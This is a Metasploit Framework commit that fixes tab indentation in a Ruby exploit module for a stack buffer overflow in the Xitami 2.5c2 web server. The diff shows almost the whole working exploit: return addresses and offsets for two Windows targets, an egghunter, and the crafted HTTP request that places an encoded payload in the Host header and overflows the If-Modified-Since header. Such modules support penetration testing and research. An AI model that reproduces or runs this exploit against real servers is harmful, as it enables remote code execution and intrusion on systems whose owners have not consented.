Fixed tab indents.

git-svn-id: file:///home/svn/framework3/trunk@5127 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/http/xitami_if_mod_since.rb

@@ -15,21 +15,20 @@ module Msf
 
 class Exploits::Windows::Http::Xitami_If_Mod_Since < Msf::Exploit::Remote
 
-	include Exploit::Remote::Tcp
+	include Exploit::Remote::Tcp
-    include Exploit::Remote::Egghunter
+	include Exploit::Remote::Egghunter
 
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'		=> 'Xitami 2.5c2 Web Server If-Modified-Since Overflow',
 			'Description'	=> %q{
-			This module exploits a stack overflow in the iMatix Corporation
+				This module exploits a stack overflow in the iMatix Corporation
-            Xitami xigui32.exe Web Server. If a malicious user sends an
+				Xitami Web Server. If a malicious user sends an	If-Modified-Since
-            If-Modified-Since header containing an overly long string, it may be
+				header containing an overly long string, it may be possible to
-            possible to execute a payload remotely. Due to size constraints,
+				execute a payload remotely. Due to size constraints, this module uses
-            this module uses the Egghunter technique. You may wish to adjust
+				the Egghunter technique. You may wish to adjust WfsDelay appropriately.
-            WfsDelay appropriately.
 			},
-			'Author' 		=> 'patrick',
+			'Author' 	=> 'patrick',
 			'License'       => MSF_LICENSE,
 			'Version'       => '$Revision$',
 			'References'    =>
@@ -51,9 +50,9 @@ class Exploits::Windows::Http::Xitami_If_Mod_Since < Msf::Exploit::Remote
 			'Platform' => ['win'],
 			'Targets'  =>
 			[
-            # Patrick - Both tested OK 20070928 - w2ksp0, w2ksp4, xpsp0, xpsp2 en.
+			# Patrick - Both tested OK 20070928 - w2ksp0, w2ksp4, xpsp0, xpsp2 en.
-                [ 'xigui32.exe Universal', { 'Ret' => "\xff\xce\x44", 'Offset' => 40 } ], # 0x0044ceff ret xigui32.exe
+				[ 'xigui32.exe Universal', { 'Ret' => "\xff\xce\x44", 'Offset' => 40 } ], # 0x0044ceff ret xigui32.exe
-                [ 'xitami.exe  Universal', { 'Ret' => "\xf2\xc1\x47", 'Offset' => 68 } ], # 0x0047c1f2 ret xitami.exe
+				[ 'xitami.exe  Universal', { 'Ret' => "\xf2\xc1\x47", 'Offset' => 68 } ], # 0x0047c1f2 ret xitami.exe
 			],
 			'DisclosureDate' => 'Sep 24 2007',
 			'DefaultTarget' => 0))
@@ -68,7 +67,7 @@ class Exploits::Windows::Http::Xitami_If_Mod_Since < Msf::Exploit::Remote
 		connect
 		sock.put("GET / HTTP/1.1\r\n\r\n")
 		banner = sock.get(-1,3)
-		disconnect
+		disconnect
 
 		if (banner =~ /Xitami/)
 			return Exploit::CheckCode::Appears
@@ -77,23 +76,23 @@ class Exploits::Windows::Http::Xitami_If_Mod_Since < Msf::Exploit::Remote
 	end
 
 	def exploit
-		connect
+		connect
-
+
-        hunter  = generate_egghunter
+		hunter  = generate_egghunter
-        egg     = hunter[1]
+		egg     = hunter[1]
-
+
-        sploit = "GET / HTTP/1.1\r\n"
+		sploit = "GET / HTTP/1.1\r\n"
-		sploit << "Host: " + egg + egg + payload.encoded + "\r\n"
+		sploit << "Host: " + egg + egg + payload.encoded + "\r\n"
-        sploit << "If-Modified-Since: " + Rex::Arch::X86.jmp_short(3) + ", "
+		sploit << "If-Modified-Since: " + Rex::Arch::X86.jmp_short(3) + ", "
-        sploit << hunter[0] + rand_text_alphanumeric(target['Offset']) + target['Ret']
+		sploit << hunter[0] + rand_text_alphanumeric(target['Offset']) + target['Ret']
-
+
-        sock.put(sploit + "\r\n\r\n")
+		sock.put(sploit + "\r\n\r\n")
-
+
-		print_status("Waiting for payload to execute...")
+		print_status("Waiting for payload to execute...")
 
 		handler
 		disconnect
-	end
+	end
 
 end
 end